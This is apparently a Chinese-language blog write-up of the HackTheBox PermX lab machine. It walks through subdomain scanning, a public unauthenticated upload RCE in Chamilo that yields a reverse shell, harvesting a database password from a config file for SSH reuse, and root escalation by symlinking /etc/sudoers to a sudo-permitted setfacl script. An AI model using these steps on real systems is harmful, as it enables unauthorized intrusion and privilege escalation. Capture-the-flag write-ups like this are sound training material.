HackTheBox-Machines PermX Writeup

kazma 成大資安社 創辦人/社長

Exploitation

先做 nmap:

1
2
3
4
5
6
7
8
9
10
11
12
└──╼ [★]$ nmap -sV 10.10.11.23
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 12:35 CDT
Nmap scan report for 10.10.11.23
Host is up (0.0022s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.39 seconds

有網頁服務跟 ssh,whatweb 看一下:

1
2
3
└──╼ [★]$ whatweb 10.10.11.23
http://10.10.11.23 [302 Found] Apache[2.4.52], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], IP[10.10.11.23], RedirectLocation[http://permx.htb], Title[302 Found]
ERROR Opening: http://permx.htb - no address for permx.htb

加到 /etc/hosts:

1
2
└──╼ [★]$ echo "10.10.11.23 permx.htb" | sudo tee -a /etc/hosts
10.10.11.23 permx.htb

用 ffuf 掃一下 subdomain:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
└──╼ [★]$ ffuf -u http://permx.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.permx.htb" | grep "Status: 200"

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://permx.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.permx.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 2ms]
lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 34ms]
:: Progress: [100000/100000] :: Job [1/1] :: 16666 req/sec :: Duration: [0:00:07] :: Errors: 0 ::

找到 www 和 lms,先都加進 /etc/hosts

1
2
3
4
5
└──╼ [★]$ echo "10.10.11.23 www.permx.htb" | sudo tee -a /etc/hosts
10.10.11.23 www.permx.htb
┌─[sg-vip-2]─[10.10.14.22]─[kazma@htb-mn1y31pgmb]─[~]
└──╼ [★]$ echo "10.10.11.23 lms.permx.htb" | sudo tee -a /etc/hosts
10.10.11.23 lms.permx.htb

www 就是首頁沒錯,但 lms 看到一個登入頁面:
chamilo
查一下這是什麼酷東西:

Chamilo is a free software (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. It is backed up by the Chamilo Association, which has goals including the promotion of the software, the maintenance of a clear communication channel and the building of a network of services providers and software contributors.

看起來是一個促進教育的免費軟體,感覺蠻有意義的,但我們還是要扁他,查一下管理員預設帳密:
default
失敗,繼續搜尋發現 chamilo 有一個 pre-auth RCE 的上傳漏洞:
https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
乖乖照著 README 做就拿到 reverse shell 了

1
2
3
4
└──╼ [★]$ nc -tlnp 4444
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$

接著搜尋 chamilo 的設定檔放在哪裡:
conf

1
2
3
www-data@permx:/var/www/chamilo/app/config$ grep -r db_pass
grep -r db_pass
configuration.php:$_configuration['db_password'] = '03F6lY3uXAP2bkW8';

順利找到了密碼是 ‘03F6lY3uXAP2bkW8’,我們嘗試 ssh 登入 mtz 這個 user:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
└──╼ [★]$ ssh [email protected]
The authenticity of host '10.10.11.23 (10.10.11.23)' can't be established.
ED25519 key fingerprint is SHA256:u9/wL+62dkDBqxAG3NyMhz/2FTBJlmVC1Y1bwaNLqGA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.23' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-113-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Sun Aug 11 06:09:41 PM UTC 2024

System load: 0.0
Usage of /: 59.7% of 7.19GB
Memory usage: 23%
Swap usage: 0%
Processes: 247
Users logged in: 1
IPv4 address for eth0: 10.10.11.23
IPv6 address for eth0: dead:beef::250:56ff:feb9:c054


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Aug 11 15:49:24 2024 from 10.10.14.21
mtz@permx:~$

成功登入!
我們看一下家目錄下有什麼:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
mtz@permx:~$ ls
sudoers user.txt
mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.sh
mtz@permx:~$ ls -l /opt/acl.sh
-rwxr-xr-x 1 root root 419 Jun 5 11:58 /opt/acl.sh
mtz@permx:~$ cat /opt/acl.sh
#!/bin/bash

if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

結果看到 sudoers,通常這應該是放在 /etc/sudoers,放這邊應該是要給我們的提示,那我們可以透過 sudo -l 來看當前用戶可以用 sudo 執行什麼權限,從上面可以看到 mtz 這個用戶可以用 sudo 執行 /opt/acl.sh 不需要輸入 root 的密碼,但我們 ls -l 會發現文件擁有者是 root,我們只有執行權限不能修改他。
那我們仔細地來看一下這份腳本在寫什麼:

1
2
3
4
5
6
7
8
if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi

user="$1"
perm="$2"
target="$3"

上面這邊會檢查執行的時候有沒有確實的附上三個參數,三個參數分別代表用戶,權限跟目標檔案。

1
2
3
4
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi

然後這邊會檢查目標是不是 /home/mtz/ 下面的檔案,且中間不能包含返回上個目錄的 “..”,如果路徑設定不正確就輸出 “Access denied”。

1
2
3
4
5
# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi

最後會去檢查第三個參數必須是個檔案否則輸出錯誤提示。
這代表我們可以透過 symbolic link 去創建一個在家目錄下的 /etc/sudoers 連結,然後用 /opt/acl.sh 去給 mtz 這個連結 rwx 的權限,再透過修改這個連結,讓 mtz 可以不用密碼用 sudo 做任何事情,完美的計劃,馬上開始執行。

1
2
3
4
5
6
7
8
9
10
11
12
13
mtz@permx:~$ ln -s /etc/sudoers /home/mtz/evil
mtz@permx:~$ ls -l
total 4
lrwxrwxrwx 1 mtz mtz 12 Aug 12 04:13 evil -> /etc/sudoers
-rw-r----- 1 root mtz 33 Aug 12 03:53 user.txt
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/evil
mtz@permx:~$ vi evil
mtz@permx:~$ cat /etc/sudoers | grep mtz
mtz ALL=(ALL:ALL) NOPASSWD:ALL
mtz ALL=(ALL:ALL) NOPASSWD: /opt/acl.sh
mtz@permx:~$ sudo su
root@permx:/home/mtz# id
uid=0(root) gid=0(root) groups=0(root)

完美,我們是天才!

Pwned !!!

pwn

  • Title: HackTheBox-Machines PermX Writeup
  • Author: kazma
  • Created at : 2024-08-12 01:34:16
  • Updated at : 2024-08-24 08:33:55
  • Link: https://kazma.tw/2024/08/12/HackTheBox-Machines-PermX-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
HackTheBox-Machines PermX Writeup